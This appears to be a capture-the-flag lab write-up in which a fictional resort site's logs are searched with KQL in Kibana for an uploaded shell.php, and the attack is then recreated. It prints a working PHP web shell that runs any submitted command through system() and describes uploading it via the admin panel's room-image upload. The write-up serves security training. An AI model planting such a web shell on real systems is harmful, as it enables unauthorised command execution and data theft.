Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

Last updated 4 months ago

Was this helpful?

Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

The target is a resort’s website, where an attacker uploaded a malicious web shell and exploited it. Our mission is twofold:

Use log analysis with KQL (Kibana Query Language) to investigate the attack.
Recreate the attack to retrieve the stolen flag.txt.

We start by analyzing logs from the frostypines-resorts dataset using KQL in Kibana. The timeframe is set from Oct 3, 2024, 11:30:00 to Oct 3, 2024, 12:00:00.

We also filter the logs for shell.php, which was the file uploaded by the attacker.

We see that the file was uploaded to the path /media/images/rooms/shell.phpand was accessed by 10.11.83.34.

Recreating the attack:

You need to add the IP address and the domain to your /etc/hosts file in Linux before proceeding.

By navigating to /admin, we gain access to an admin panel that includes a room creation feature with an image upload option.

Here, we can upload a PHP reverse shell (shell.php) as the room's image:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

The above script, when accessed, displays an input field. Whatever is entered in this input field is then run against the underlying operating system using the system() PHP function, and the output is displayed to the user.

Once the file is uploaded, it can be accessed at the following URL:

On accessing the page, we have an input field and Execute button:

Try executing linux commands and retrieve the flag!